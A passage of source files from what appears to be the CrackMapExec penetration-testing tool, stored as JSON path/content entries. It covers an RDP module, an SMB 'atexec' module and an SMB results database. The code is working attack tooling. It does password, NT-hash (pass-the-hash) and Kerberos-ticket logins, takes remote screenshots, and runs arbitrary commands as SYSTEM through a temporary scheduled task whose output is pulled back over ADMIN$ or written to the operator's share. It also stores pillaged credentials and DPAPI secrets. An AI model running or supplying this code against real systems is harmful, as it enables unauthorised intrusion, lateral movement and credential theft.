({nla})\")\n else:\n self.logger.display(f\"{self.server_os} (name:{self.hostname}) (domain:{self.domain})\" f\" ({nla})\")\n return True\n\n def create_conn_obj(self):\n self.target = RDPTarget(ip=self.host, domain=\"FAKE\", port=self.args.port, timeout=self.args.rdp_timeout)\n self.auth = NTLMCredential(secret=\"pass\", username=\"user\", domain=\"FAKE\", stype=asyauthSecret.PASS)\n\n self.check_nla()\n\n for proto in reversed(self.protoflags):\n try:\n self.iosettings.supported_protocols = proto\n self.conn = RDPConnection(\n iosettings=self.iosettings,\n target=self.target,\n credentials=self.auth,\n )\n asyncio.run(self.connect_rdp())\n except OSError as e:\n if \"Errno 104\" not in str(e):\n return False\n except Exception as e:\n if \"TCPSocket\" in str(e):\n return False\n if \"Reason:\" not in str(e):\n try:\n info_domain = self.conn.get_extra_info()\n except:\n pass\n else:\n self.domain = info_domain[\"dnsdomainname\"]\n self.hostname = info_domain[\"computername\"]\n self.server_os = info_domain[\"os_guess\"] + \" Build \" + str(info_domain[\"os_build\"])\n self.logger.extra[\"hostname\"] = self.hostname\n self.output_filename = os.path.expanduser(f\"~/.cme/logs/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}\".replace(\":\", \"-\"))\n break\n\n if self.args.domain:\n self.domain = self.args.domain\n\n if self.args.local_auth:\n self.domain = self.hostname\n\n self.target = RDPTarget(\n ip=self.host,\n hostname=self.hostname,\n port=self.args.port,\n domain=self.domain,\n dc_ip=self.domain,\n timeout=self.args.rdp_timeout,\n )\n\n return True\n\n def check_nla(self):\n for proto in self.protoflags_nla:\n try:\n self.iosettings.supported_protocols = proto\n self.conn = RDPConnection(\n iosettings=self.iosettings,\n target=self.target,\n credentials=self.auth,\n )\n asyncio.run(self.connect_rdp())\n if str(proto) == \"SUPP_PROTOCOLS.RDP\" or str(proto) == \"SUPP_PROTOCOLS.SSL\" or str(proto) == \"SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP\":\n self.nla = False\n return\n except Exception as e:\n pass\n\n async def connect_rdp(self):\n _, err = await asyncio.wait_for(self.conn.connect(), timeout=self.args.rdp_timeout)\n if err is not None:\n raise err\n\n def kerberos_login(self, domain, username, password=\"\", ntlm_hash=\"\", aesKey=\"\", kdcHost=\"\", useCache=False):\n try:\n lmhash = \"\"\n nthash = \"\"\n # This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(\":\") != -1:\n lmhash, nthash = ntlm_hash.split(\":\")\n self.hash = nthash\n else:\n nthash = ntlm_hash\n self.hash = ntlm_hash\n if lmhash:\n self.lmhash = lmhash\n if nthash:\n self.nthash = nthash\n\n if not all(\"\" == s for s in [nthash, password, aesKey]):\n kerb_pass = next(s for s in [nthash, password, aesKey] if s)\n else:\n kerb_pass = \"\"\n\n fqdn_host = self.hostname + \".\" + self.domain\n password = password if password else nthash\n\n if useCache:\n stype = asyauthSecret.CCACHE\n if not password:\n password = getenv(\"KRB5CCNAME\") if not password else password\n if \"/\" in password:\n self.logger.fail(\"Kerberos ticket need to be on the local directory\")\n return False\n ccache = CCache.loadFile(getenv(\"KRB5CCNAME\"))\n ticketCreds = ccache.credentials[0]\n username = ticketCreds[\"client\"].prettyPrint().decode().split(\"@\")[0]\n else:\n stype = asyauthSecret.PASS if not nthash else asyauthSecret.NT\n\n kerberos_target = UniTarget(\n self.domain,\n 88,\n UniProto.CLIENT_TCP,\n proxies=None,\n dns=None,\n dc_ip=self.domain,\n domain=self.domain\n )\n self.auth = KerberosCredential(\n target=kerberos_target,\n secret=password,\n username=username,\n domain=domain,\n stype=stype,\n )\n self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)\n asyncio.run(self.connect_rdp())\n\n self.admin_privs = True\n self.logger.success(\n \"{}\\\\{}{} {}\".format(\n domain,\n username,\n (\n # Show what was used between cleartext, nthash, aesKey and ccache\n \" from ccache\"\n if useCache\n else \":%s\" % (process_secret(kerb_pass))\n ),\n self.mark_pwned(),\n )\n )\n if not self.args.local_auth:\n add_user_bh(username, domain, self.logger, self.config)\n return True\n\n except Exception as e:\n if \"KDC_ERR\" in str(e):\n reason = None\n for word in self.rdp_error_status.keys():\n if word in str(e):\n reason = self.rdp_error_status[word]\n self.logger.fail(\n (f\"{domain}\\\\{username}{' from ccache' if useCache else ':%s' % (process_secret(kerb_pass))} {f'({reason})' if reason else str(e)}\"),\n color=(\"magenta\" if ((reason or \"CredSSP\" in str(e)) and reason != \"KDC_ERR_C_PRINCIPAL_UNKNOWN\") else \"red\"),\n )\n elif \"Authentication failed!\" in str(e):\n self.logger.success(f\"{domain}\\\\{username}:{(process_secret(password))} {self.mark_pwned()}\")\n elif \"No such file\" in str(e):\n self.logger.fail(e)\n else:\n reason = None\n for word in self.rdp_error_status.keys():\n if word in str(e):\n reason = self.rdp_error_status[word]\n if \"cannot unpack non-iterable NoneType object\" == str(e):\n reason = \"User valid but cannot connect\"\n self.logger.fail(\n (f\"{domain}\\\\{username}{' from ccache' if useCache else ':%s' % (process_secret(kerb_pass))} {f'({reason})' if reason else ''}\"),\n color=(\"magenta\" if ((reason or \"CredSSP\" in str(e)) and reason != \"STATUS_LOGON_FAILURE\") else \"red\"),\n )\n return False\n\n def plaintext_login(self, domain, username, password):\n try:\n self.auth = NTLMCredential(\n secret=password,\n username=username,\n domain=domain,\n stype=asyauthSecret.PASS,\n )\n self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)\n asyncio.run(self.connect_rdp())\n\n self.admin_privs = True\n self.logger.success(f\"{domain}\\\\{username}:{process_secret(password)} {self.mark_pwned()}\")\n if not self.args.local_auth:\n add_user_bh(username, domain, self.logger, self.config)\n return True\n except Exception as e:\n if \"Authentication failed!\" in str(e):\n self.logger.success(f\"{domain}\\\\{username}:{process_secret(password)} {self.mark_pwned()}\")\n else:\n reason = None\n for word in self.rdp_error_status.keys():\n if word in str(e):\n reason = self.rdp_error_status[word]\n if \"cannot unpack non-iterable NoneType object\" == str(e):\n reason = \"User valid but cannot connect\"\n self.logger.fail(\n (f\"{domain}\\\\{username}:{process_secret(password)} {f'({reason})' if reason else ''}\"),\n color=(\"magenta\" if ((reason or \"CredSSP\" in str(e)) and reason != \"STATUS_LOGON_FAILURE\") else \"red\"),\n )\n return False\n\n def hash_login(self, domain, username, ntlm_hash):\n try:\n self.auth = NTLMCredential(\n secret=ntlm_hash,\n username=username,\n domain=domain,\n stype=asyauthSecret.NT,\n )\n self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)\n asyncio.run(self.connect_rdp())\n\n self.admin_privs = True\n self.logger.success(f\"{self.domain}\\\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}\")\n if not self.args.local_auth:\n add_user_bh(username, domain, self.logger, self.config)\n return True\n except Exception as e:\n if \"Authentication failed!\" in str(e):\n self.logger.success(f\"{domain}\\\\{username}:{process_secret(ntlm_hash)} {self.mark_pwned()}\")\n else:\n reason = None\n for word in self.rdp_error_status.keys():\n if word in str(e):\n reason = self.rdp_error_status[word]\n if \"cannot unpack non-iterable NoneType object\" == str(e):\n reason = \"User valid but cannot connect\"\n\n self.logger.fail(\n (f\"{domain}\\\\{username}:{process_secret(ntlm_hash)} {f'({reason})' if reason else ''}\"),\n color=(\"magenta\" if ((reason or \"CredSSP\" in str(e)) and reason != \"STATUS_LOGON_FAILURE\") else \"red\"),\n )\n return False\n\n async def screen(self):\n try:\n self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)\n await self.connect_rdp()\n except Exception as e:\n return\n\n await asyncio.sleep(int(5))\n if self.conn is not None and self.conn.desktop_buffer_has_data is True:\n buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL)\n filename = os.path.expanduser(f\"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png\")\n buffer.save(filename, \"png\")\n self.logger.highlight(f\"Screenshot saved {filename}\")\n\n def screenshot(self):\n asyncio.run(self.screen())\n\n async def nla_screen(self):\n # Otherwise it crash\n self.iosettings.supported_protocols = None\n self.auth = NTLMCredential(secret=\"\", username=\"\", domain=\"\", stype=asyauthSecret.PASS)\n self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)\n await self.connect_rdp()\n await asyncio.sleep(int(self.args.screentime))\n\n if self.conn is not None and self.conn.desktop_buffer_has_data is True:\n buffer = self.conn.get_desktop_buffer(VIDEO_FORMAT.PIL)\n filename = os.path.expanduser(f\"~/.cme/screenshots/{self.hostname}_{self.host}_{datetime.now().strftime('%Y-%m-%d_%H%M%S')}.png\")\n buffer.save(filename, \"png\")\n self.logger.highlight(f\"NLA Screenshot saved {filename}\")\n\n def nla_screenshot(self):\n if not self.nla:\n asyncio.run(self.nla_screen())\n" }, { "path": "cme/protocols/smb/__init__.py", "content": "" }, { "path": "cme/protocols/smb/atexec.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom impacket.dcerpc.v5 import tsch, transport\nfrom impacket.dcerpc.v5.dtypes import NULL\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_PRIVACY\nfrom cme.helpers.misc import gen_random_string\nfrom time import sleep\n\n\nclass TSCH_EXEC:\n def __init__(\n self,\n target,\n share_name,\n username,\n password,\n domain,\n doKerberos=False,\n aesKey=None,\n kdcHost=None,\n hashes=None,\n logger=None,\n tries=None,\n share=None\n ):\n self.__target = target\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__share_name = share_name\n self.__lmhash = \"\"\n self.__nthash = \"\"\n self.__outputBuffer = b\"\"\n self.__retOutput = False\n self.__aesKey = aesKey\n self.__doKerberos = doKerberos\n self.__kdcHost = kdcHost\n self.__tries = tries\n self.logger = logger\n\n if hashes is not None:\n # This checks to see if we didn't provide the LM Hash\n if hashes.find(\":\") != -1:\n self.__lmhash, self.__nthash = hashes.split(\":\")\n else:\n self.__nthash = hashes\n\n if self.__password is None:\n self.__password = \"\"\n\n stringbinding = r\"ncacn_np:%s[\\pipe\\atsvc]\" % self.__target\n self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)\n\n if hasattr(self.__rpctransport, \"set_credentials\"):\n # This method exists only for selected protocol sequences.\n self.__rpctransport.set_credentials(\n self.__username,\n self.__password,\n self.__domain,\n self.__lmhash,\n self.__nthash,\n self.__aesKey,\n )\n self.__rpctransport.set_kerberos(self.__doKerberos, self.__kdcHost)\n\n def execute(self, command, output=False):\n self.__retOutput = output\n self.execute_handler(command)\n return self.__outputBuffer\n\n def output_callback(self, data):\n self.__outputBuffer = data\n\n def gen_xml(self, command, tmpFileName, fileless=False):\n xml = \"\"\"\n\n \n \n 2015-07-15T20:35:13.2757294\n true\n \n 1\n \n \n \n \n \n S-1-5-18\n HighestAvailable\n \n \n \n IgnoreNew\n false\n false\n true\n false\n \n true\n false\n \n true\n true\n true\n false\n false\n P3D\n 7\n \n \n \n cmd.exe\n\"\"\"\n if self.__retOutput:\n if fileless:\n local_ip = self.__rpctransport.get_socket().getsockname()[0]\n argument_xml = f\" /C {command} > \\\\\\\\{local_ip}\\\\{self.__share_name}\\\\{tmpFileName} 2>&1\"\n else:\n argument_xml = f\" /C {command} > %windir%\\\\Temp\\\\{tmpFileName} 2>&1\"\n\n elif self.__retOutput is False:\n argument_xml = f\" /C {command}\"\n\n self.logger.debug(\"Generated argument XML: \" + argument_xml)\n xml += argument_xml\n\n xml += \"\"\"\n \n \n\n\"\"\"\n return xml\n\n def execute_handler(self, command, fileless=False):\n dce = self.__rpctransport.get_dce_rpc()\n if self.__doKerberos:\n dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE)\n\n dce.set_credentials(*self.__rpctransport.get_credentials())\n dce.connect()\n # dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)\n \n tmpName = gen_random_string(8)\n tmpFileName = tmpName + \".tmp\"\n\n xml = self.gen_xml(command, tmpFileName, fileless)\n\n self.logger.info(f\"Task XML: {xml}\")\n taskCreated = False\n self.logger.info(f\"Creating task \\\\{tmpName}\")\n try:\n # windows server 2003 has no MSRPC_UUID_TSCHS, if it bind, it will return abstract_syntax_not_supported\n dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)\n dce.bind(tsch.MSRPC_UUID_TSCHS)\n tsch.hSchRpcRegisterTask(dce, f\"\\\\{tmpName}\", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)\n except Exception as e:\n if e.error_code and hex(e.error_code) == \"0x80070005\":\n self.logger.fail(\"ATEXEC: Create schedule task got blocked.\")\n else:\n self.logger.fail(str(e))\n return\n else:\n taskCreated = True\n\n self.logger.info(f\"Running task \\\\{tmpName}\")\n tsch.hSchRpcRun(dce, f\"\\\\{tmpName}\")\n\n done = False\n while not done:\n self.logger.debug(f\"Calling SchRpcGetLastRunInfo for \\\\{tmpName}\")\n resp = tsch.hSchRpcGetLastRunInfo(dce, f\"\\\\{tmpName}\")\n if resp[\"pLastRuntime\"][\"wYear\"] != 0:\n done = True\n else:\n sleep(2)\n\n self.logger.info(f\"Deleting task \\\\{tmpName}\")\n tsch.hSchRpcDelete(dce, f\"\\\\{tmpName}\")\n taskCreated = False\n\n if taskCreated is True:\n tsch.hSchRpcDelete(dce, \"\\\\%s\" % tmpName)\n\n if self.__retOutput:\n if fileless:\n while True:\n try:\n with open(os.path.join(\"/tmp\", \"cme_hosted\", tmpFileName), \"r\") as output:\n self.output_callback(output.read())\n break\n except IOError:\n sleep(2)\n else:\n peer = \":\".join(map(str, self.__rpctransport.get_socket().getpeername()))\n smbConnection = self.__rpctransport.get_smb_connection()\n tries = 1\n while True:\n try:\n self.logger.info(f\"Attempting to read ADMIN$\\\\Temp\\\\{tmpFileName}\")\n smbConnection.getFile(\"ADMIN$\", f\"Temp\\\\{tmpFileName}\", self.output_callback)\n break\n except Exception as e:\n if tries >= self.__tries:\n self.logger.fail(f'ATEXEC: Get output file error, maybe got detected by AV software, please increase the number of tries with the option \"--get-output-tries\". If it\\'s still failing maybe something is blocking the schedule job, try another exec method')\n break\n if str(e).find(\"STATUS_BAD_NETWORK_NAME\") >0 :\n self.logger.fail(f'ATEXEC: Get ouput failed, target has blocked ADMIN$ access (maybe command executed!)')\n break\n if str(e).find(\"SHARING\") > 0 or str(e).find(\"STATUS_OBJECT_NAME_NOT_FOUND\") >= 0:\n sleep(3)\n tries += 1\n else:\n self.logger.debug(str(e))\n\n if self.__outputBuffer:\n self.logger.debug(f\"Deleting file ADMIN$\\\\Temp\\\\{tmpFileName}\")\n smbConnection.deleteFile(\"ADMIN$\", f\"Temp\\\\{tmpFileName}\")\n\n dce.disconnect()\n" }, { "path": "cme/protocols/smb/database.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport base64\nimport warnings\nfrom datetime import datetime\nfrom pathlib import Path\n\nfrom sqlalchemy import MetaData, func, Table, select, delete\nfrom sqlalchemy.dialects.sqlite import Insert # used for upsert\nfrom sqlalchemy.exc import (\n IllegalStateChangeError,\n NoInspectionAvailable,\n NoSuchTableError,\n)\nfrom sqlalchemy.exc import SAWarning\nfrom sqlalchemy.orm import sessionmaker, scoped_session\n\nfrom cme.logger import cme_logger\n\n# if there is an issue with SQLAlchemy and a connection cannot be cleaned up properly it spews out annoying warnings\nwarnings.filterwarnings(\"ignore\", category=SAWarning)\n\n\nclass database:\n def __init__(self, db_engine):\n self.HostsTable = None\n self.UsersTable = None\n self.GroupsTable = None\n self.SharesTable = None\n self.AdminRelationsTable = None\n self.GroupRelationsTable = None\n self.LoggedinRelationsTable = None\n self.ConfChecksTable = None\n self.ConfChecksResultsTable = None\n self.DpapiBackupkey = None\n self.DpapiSecrets = None\n\n self.db_engine = db_engine\n self.db_path = self.db_engine.url.database\n self.protocol = Path(self.db_path).stem.upper()\n self.metadata = MetaData()\n self.reflect_tables()\n session_factory = sessionmaker(bind=self.db_engine, expire_on_commit=True)\n\n Session = scoped_session(session_factory)\n # this is still named \"conn\" when it is the session object; TODO: rename\n self.conn = Session()\n\n @staticmethod\n def db_schema(db_conn):\n db_conn.execute(\n \"\"\"CREATE TABLE \"hosts\" (\n \"id\" integer PRIMARY KEY,\n \"ip\" text,\n \"hostname\" text,\n \"domain\" text,\n \"os\" text,\n \"dc\" boolean,\n \"smbv1\" boolean,\n \"signing\" boolean,\n \"spooler\" boolean,\n \"zerologon\" boolean,\n \"petitpotam\" boolean\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"conf_checks\" (\n \"id\" integer PRIMARY KEY,\n \"name\" text,\n \"description\" text\n )\"\"\"\n )\n\n db_conn.execute(\n \"\"\"CREATE TABLE \"conf_checks_results\" (\n \"id\" integer PRIMARY KEY,\n \"host_id\" integer,\n \"check_id\" integer,\n \"secure\" boolean,\n \"reasons\" text,\n FOREIGN KEY(host_id) REFERENCES hosts(id),\n FOREIGN KEY(check_id) REFERENCES conf_checks(id)\n )\n \"\"\"\n )\n\n # type = hash, plaintext\n db_conn.execute(\n \"\"\"CREATE TABLE \"users\" (\n \"id\" integer PRIMARY KEY,\n \"domain\" text,\n \"username\" text,\n \"password\" text,\n \"credtype\" text,\n \"pillaged_from_hostid\" integer,\n FOREIGN KEY(pillaged_from_hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"groups\" (\n \"id\" integer PRIMARY KEY,\n \"domain\" text,\n \"name\" text,\n \"rid\" text,\n \"member_count_ad\" integer,\n \"last_query_time\" text\n )\"\"\"\n )\n # This table keeps track of which credential has admin access over which machine and vice-versa\n db_conn.execute(\n \"\"\"CREATE TABLE \"admin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"userid\" integer,\n \"hostid\" integer,\n FOREIGN KEY(userid) REFERENCES users(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"group_relations\" (\n \"id\" integer PRIMARY KEY,\n \"userid\" integer,\n \"groupid\" integer,\n FOREIGN KEY(userid) REFERENCES users(id),\n FOREIGN KEY(groupid) REFERENCES groups(id)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"shares\" (\n \"id\" integer PRIMARY KEY,\n \"hostid\" text,\n \"userid\" integer,\n \"name\" text,\n \"remark\" text,\n \"read\" boolean,\n \"write\" boolean,\n FOREIGN KEY(userid) REFERENCES users(id)\n UNIQUE(hostid, userid, name)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"loggedin_relations\" (\n \"id\" integer PRIMARY KEY,\n \"userid\" integer,\n \"hostid\" integer,\n FOREIGN KEY(userid) REFERENCES users(id),\n FOREIGN KEY(hostid) REFERENCES hosts(id)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"dpapi_secrets\" (\n \"id\" integer PRIMARY KEY,\n \"host\" text,\n \"dpapi_type\" text,\n \"windows_user\" text,\n \"username\" text,\n \"password\" text,\n \"url\" text,\n UNIQUE(host, dpapi_type, windows_user, username, password, url)\n )\"\"\"\n )\n db_conn.execute(\n \"\"\"CREATE TABLE \"dpapi_backupkey\" (\n \"id\" integer PRIMARY KEY,\n \"domain\" text,\n \"pvk\" text,\n UNIQUE(domain)\n )\"\"\"\n )\n # db_conn.execute('''CREATE TABLE \"ntds_dumps\" (\n # \"id\" integer PRIMARY KEY,\n # \"hostid\", integer,\n # \"domain\" text,\n # \"username\" text,\n # \"hash\" text,\n # FOREIGN KEY(hostid) REFERENCES hosts(id)\n # )''')\n\n def reflect_tables(self):\n with self.db_engine.connect() as conn:\n try:\n self.HostsTable = Table(\"hosts\", self.metadata, autoload_with=self.db_engine)\n self.UsersTable = Table(\"users\", self.metadata, autoload_with=self.db_engine)\n self.GroupsTable = Table(\"groups\", self.metadata, autoload_with=self.db_engine)\n self.SharesTable = Table(\"shares\", self.metadata, autoload_with=self.db_engine)\n self.AdminRelationsTable = Table(\"admin_relations\", self.metadata, autoload_with=self.db_engine)\n self.GroupRelationsTable = Table(\"group_relations\", self.metadata, autoload_with=self.db_engine)\n self.LoggedinRelationsTable = Table(\"loggedin_relations\", self.metadata, autoload_with=self.db_engine)\n self.DpapiSecrets = Table(\"dpapi_secrets\", self.metadata, autoload_with=self.db_engine)\n self.DpapiBackupkey = Table(\"dpapi_backupkey\", self.metadata, autoload_with=self.db_engine)\n self.ConfChecksTable = Table(\"conf_checks\", self.metadata, autoload_with=self.db_engine)\n self.ConfChecksResultsTable = Table(\"conf_checks_results\", self.metadata, autoload_with=self.db_engine)\n except (NoInspectionAvailable, NoSuchTableError):\n print(\n f\"\"\"\n [-] Error reflecting tables for the {self.protocol} protocol - this means there is a DB schema mismatch\n [-] This is probably because a newer version of CME is being ran on an old DB schema\n [-] Optionally save the old DB data (`cp {self.db_path} ~/cme_{self.protocol.lower()}.bak`)\n [-] Then remove the {self.protocol} DB (`rm -f {self.db_path}`) and run CME to initialize the new DB\"\"\"\n )\n exit()\n\n def shutdown_db(self):\n try:\n self.conn.close()\n # due to the async nature of CME, sometimes session state is a bit messy and this will throw:\n # Method 'close()' can't be called here; method '_connection_for_bind()' is already in progress and\n # this would cause an unexpected state change to \n except IllegalStateChangeError as e:\n cme_logger.debug(f\"Error while closing session db object: {e}\")\n\n def clear_database(self):\n for table in self.metadata.sorted_tables:\n self.conn.execute(table.delete())\n\n # pull/545\n def add_host(\n self,\n ip,\n hostname,\n domain,\n os,\n smbv1,\n signing,\n spooler=None,\n zerologon=None,\n petitpotam=None,\n dc=None,\n ):\n \"\"\"\n Check if this host has already been added to the database, if not, add it in.\n \"\"\"\n hosts = []\n updated_ids = []\n\n q = select(self.HostsTable).filter(self.HostsTable.c.ip == ip)\n results = self.conn.execute(q).all()\n\n # create new host\n if not results:\n new_host = {\n \"ip\": ip,\n \"hostname\": hostname,\n \"domain\": domain,\n \"os\": os if os is not None else \"\",\n \"dc\": dc,\n \"smbv1\": smbv1,\n \"signing\": signing,\n \"spooler\": spooler,\n \"zerologon\": zerologon,\n \"petitpotam\": petitpotam,\n }\n hosts = [new_host]\n # update existing hosts data\n else:\n for host in results:\n host_data = host._asdict()\n # only update column if it is being passed in\n if ip is not None:\n host_data[\"ip\"] = ip\n if hostname is not None:\n host_data[\"hostname\"] = hostname\n if domain is not None:\n host_data[\"domain\"] = domain\n if os is not None:\n host_data[\"os\"] = os\n if smbv1 is not None:\n host_data[\"smbv1\"] = smbv1\n if signing is not None:\n host_data[\"signing\"] = signing\n if spooler is not None:\n host_data[\"spooler\"] = spooler\n if zerologon is not None:\n host_data[\"zerologon\"] = zerologon\n if petitpotam is not None:\n host_data[\"petitpotam\"] = petitpotam\n if dc is not None:\n host_data[\"dc\"] = dc\n # only add host to be updated if it has changed\n if host_data not in hosts:\n hosts.append(host_data)\n updated_ids.append(host_data[\"id\"])\n cme_logger.debug(f\"Update Hosts: {hosts}\")\n\n # TODO: find a way to abstract this away to a single Upsert call\n q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id)\n update_columns = {col.name: col for col in q.excluded if col.name not in \"id\"}\n q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns)\n\n self.conn.execute(q, hosts) # .scalar()\n # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted\n if updated_ids:\n cme_logger.debug(f\"add_host() - Host IDs Updated: {updated_ids}\")\n return updated_ids\n\n def add_credential(self, credtype, domain, username, password, group_id=None, pillaged_from=None):\n \"\"\"\n Check if this credential has already been added to the database, if not add it in.\n \"\"\"\n credentials = []\n groups = []\n\n if (group_id and not self.is_group_valid(group_id)) or (pillaged_from and not self.is_host_valid(pillaged_from)):\n cme_logger.debug(f\"Invalid group or host\")\n return\n\n q = select(self.UsersTable).filter(\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n func.lower(self.UsersTable.c.credtype) == func.lower(credtype),\n )\n results = self.conn.execute(q).all()\n\n # add new credential\n if not results:\n new_cred = {\n \"credtype\": credtype,\n \"domain\": domain,\n \"username\": username,\n \"password\": password,\n \"groupid\": group_id,\n \"pillaged_from\": pillaged_from,\n }\n credentials = [new_cred]\n # update existing cred data\n else:\n for creds in results:\n # this will include the id, so we don't touch it\n cred_data = creds._asdict()\n # only update column if it is being passed in\n if credtype is not None:\n cred_data[\"credtype\"] = credtype\n if domain is not None:\n cred_data[\"domain\"] = domain\n if username is not None:\n cred_data[\"username\"] = username\n if password is not None:\n cred_data[\"password\"] = password\n if group_id is not None:\n cred_data[\"groupid\"] = group_id\n groups.append({\"userid\": cred_data[\"id\"], \"groupid\": group_id})\n if pillaged_from is not None:\n cred_data[\"pillaged_from\"] = pillaged_from\n # only add cred to be updated if it has changed\n if cred_data not in credentials:\n credentials.append(cred_data)\n\n # TODO: find a way to abstract this away to a single Upsert call\n q_users = Insert(self.UsersTable) # .returning(self.UsersTable.c.id)\n update_columns_users = {col.name: col for col in q_users.excluded if col.name not in \"id\"}\n q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users)\n cme_logger.debug(f\"Adding credentials: {credentials}\")\n\n self.conn.execute(q_users, credentials) # .scalar()\n\n if groups:\n q_groups = Insert(self.GroupRelationsTable)\n\n self.conn.execute(q_groups, groups)\n # return user_ids\n\n def remove_credentials(self, creds_id):\n \"\"\"\n Removes a credential ID from the database\n \"\"\"\n del_hosts = []\n for cred_id in creds_id:\n q = delete(self.UsersTable).filter(self.UsersTable.c.id == cred_id)\n del_hosts.append(q)\n self.conn.execute(q)\n\n def add_admin_user(self, credtype, domain, username, password, host, user_id=None):\n add_links = []\n\n creds_q = select(self.UsersTable)\n if user_id:\n creds_q = creds_q.filter(self.UsersTable.c.id == user_id)\n else:\n creds_q = creds_q.filter(\n func.lower(self.UsersTable.c.credtype) == func.lower(credtype),\n func.lower(self.UsersTable.c.domain) == func.lower(domain),\n func.lower(self.UsersTable.c.username) == func.lower(username),\n self.UsersTable.c.password == password,\n )\n users = self.conn.execute(creds_q)\n hosts = self.get_hosts(host)\n\n if users and hosts:\n for user, host in zip(users, hosts):\n user_id = user[0]\n host_id = host[0]\n link = {\"userid\": user_id, \"hostid\": host_id}\n admin_relations_select = select(self.AdminRelationsTable).filter(\n self.AdminRelationsTable.c.userid == user_id,\n self.AdminRelationsTable.c.hostid == host_id,\n )\n links = self.conn.execute(admin_relations_select).all()\n\n if not links:\n add_links.append(link)\n\n admin_relations_insert = Insert(self.AdminRelationsTable)\n\n if add_links:\n self.conn.execute(admin_relations_insert, add_links)\n\n def get_admin_relations(self, user_id=None, host_id=None):\n if user_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id)\n elif host_id:\n q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id)\n else:\n q = select(self.AdminRelationsTable)\n\n results = self.conn.execute(q).all()\n return results\n\n def remove_admin_relation(self, user_ids=None, host_ids=None):\n q = delete(self.AdminRelationsTable)\n if user_ids:\n for user_id in user_ids:\n q = q.filter(self.AdminRelationsTable.c.userid == user_id)\n elif host_ids:\n for host_id in host_ids:\n q = q.filter(self.AdminRelationsTable.c.hostid == host_id)\n self.conn.execute(q)\n\n def is_credential_valid(self, credential_id):\n \"\"\"\n Check if this credential ID is valid.\n \"\"\"\n q = select(self.UsersTable).filter(\n self.UsersTable.c.id == credential_id,\n self.UsersTable.c.password is not None,\n )\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_credentials(self, filter_term=None, cred_type=None):\n \"\"\"\n Return credentials from the database.\n \"\"\"\n # if we're returning a single credential by ID\n if self.is_credential_valid(filter_term):\n q = select(self.UsersTable).filter(self.UsersTable.c.id == filter_term)\n elif cred_type:\n q = select(self.UsersTable).filter(self.UsersTable.c.credtype == cred_type)\n # if we're filtering by username\n elif filter_term and filter_term != \"\":\n like_term = func.lower(f\"%{filter_term}%\")\n q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term))\n # otherwise return all credentials\n else:\n q = select(self.UsersTable)\n\n results = self.conn.execute(q).all()\n return results\n\n def get_credential(self, cred_type, domain, username, password):\n\n q = select(self.UsersTable).filter(\n self.UsersTable.c.domain == domain,\n self.UsersTable.c.username == username,\n self.UsersTable.c.password == password,\n self.UsersTable.c.credtype == cred_type,\n )\n results = self.conn.execute(q).first()\n return results.id\n\n def is_credential_local(self, credential_id):\n q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id)\n user_domain = self.conn.execute(q).all()\n\n if user_domain:\n q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain))\n results = self.conn.execute(q).all()\n\n return len(results) > 0\n\n def is_host_valid(self, host_id):\n \"\"\"\n Check if this host ID is valid.\n \"\"\"\n q = select(self.HostsTable).filter(self.HostsTable.c.id == host_id)\n results = self.conn.execute(q).all()\n return len(results) > 0\n\n def get_hosts(self, filter_term=None, domain=None):\n \"\"\"\n Return hosts from the database.\n \"\"\"\n q = select(self.HostsTable)\n\n # if we're returning a single host by ID\n if self.is_host_valid(filter_term):\n q = q.filter(self.HostsTable.c.id == filter_term)\n results = self.conn.execute(q).first()\n # all() returns a list, so we keep the return format the same so consumers don't have to guess\n return [results]\n # if we're filtering by domain controllers\n elif filter_term == \"dc\":\n q = q.filter(self.HostsTable.c.dc == True)\n if domain:\n q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain))\n elif filter_term == \"signing\":\n # generally we want hosts that are vulnerable, so signing disabled\n q = 